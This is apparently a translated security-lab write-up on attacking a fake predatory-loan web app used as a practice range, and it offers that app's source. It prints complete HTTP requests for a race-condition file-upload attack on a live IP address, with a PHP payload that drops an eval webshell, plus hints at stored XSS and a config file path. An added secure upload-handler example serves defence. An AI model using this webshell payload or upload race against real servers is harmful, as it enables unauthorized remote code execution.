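0x01 Preface:
Does everyone still remember the practice range that was made public during the final interactive session of HackingClub's first offline tech party?
After all the experts showed what they could do, a webshell was finally obtained two and a half hours later!
Afterwards, we opened the range environment to the public for a few days for everyone to play with:
Then many experts came to me asking for the source code of this program, so today I decided to release it!
0x02 Solution:
Following the hint, the upload point was found:
After many attempts, it turned out to be a race-condition upload vulnerability: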
Request contents:

    POST /onup/upload.php HTTP/1.1
    Host: 39.98.78.223
    Content-Length: 266
    Cache-Control: max-age=0
    Origin: http://39.98.78.223
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryviDgu5MACkZpSdGS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://39.98.78.223/onup/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7
    Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2
    Connection: close

    ------WebKitFormBoundaryviDgu5MACkZpSdGS
    Content-Disposition: form-data; name="file"; filename="file.php"
    Content-Type: application/octet-stream

    <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?>
    ------WebKitFormBoundaryviDgu5MACkZpSdGS--

    GET /onup/upload/file.php HTTP/1.1
    Host: 39.98.78.223
    DNT: 1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7
    Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2
    Connection: close

    http://39.98.78.223/onup/upload/shell.php
Getshell
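An added example, not the range program's code (the page does not show upload.php): one way to write an upload handler that has no race window of the kind described above, because the file is validated while it is still in PHP's temporary location and only then moved, under a server-generated name, to a directory outside the web root. The form field name `file` comes from the request above; the storage path, size limit and allow-list are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed values for illustration (not from the original program).
const STORE_DIR = '/srv/app-data/uploads';   // outside the document root
const MAX_BYTES = 2 * 1024 * 1024;
const ALLOWED   = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function reject(int $code, string $msg): void
{
    http_response_code($code);
    exit($msg);
}

$f = $_FILES['file'] ?? null;   // field name taken from the request above
if (!is_array($f) || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'upload failed');
}
if ($f['size'] > MAX_BYTES) {
    reject(413, 'file too large');
}

// 1. Validate BEFORE the file is placed anywhere a client can request it.
//    The racy order is: move into the web root, check, unlink() on failure.
//    Between the move and the unlink the file is reachable and executable.
$ext = strtolower(pathinfo((string) $f['name'], PATHINFO_EXTENSION));
if (!array_key_exists($ext, ALLOWED)) {
    reject(415, 'type not allowed');
}

// 2. Derive the type from the bytes, not from the client's Content-Type header.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if ($mime !== ALLOWED[$ext]) {
    reject(415, 'content does not match extension');
}

// 3. Server-chosen name: the client controls neither the name nor the extension,
//    and the destination is not served (or executed) by the web server.
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($f['tmp_name'], STORE_DIR . '/' . $name)) {
    reject(500, 'could not store file');
}

header('Content-Type: application/json');
echo json_encode(['id' => $name]);
```

If uploads must live under the web root, the web server should additionally be configured not to execute scripts in that directory.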
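0x03 Afterword:
In fact, without those restrictions there are other ways to solve it, so the stage is yours!
Go audit the code!
(Known: stored XSS)
(The database is in the root directory; the database configuration file is at WWWAppConfconfig.db.php)
0x04 Source code download:
Follow the official account and reply: 假冒贷款
to download the program source code!
(Available for 24 hours only! Please download as soon as possible! Please delete it within 24 hours of downloading! For learning purposes only)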
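This article was first published on the WeChat official account (弥天安全实验室): Filling the gap! Source code of a fake predatory loan program made public (limited time)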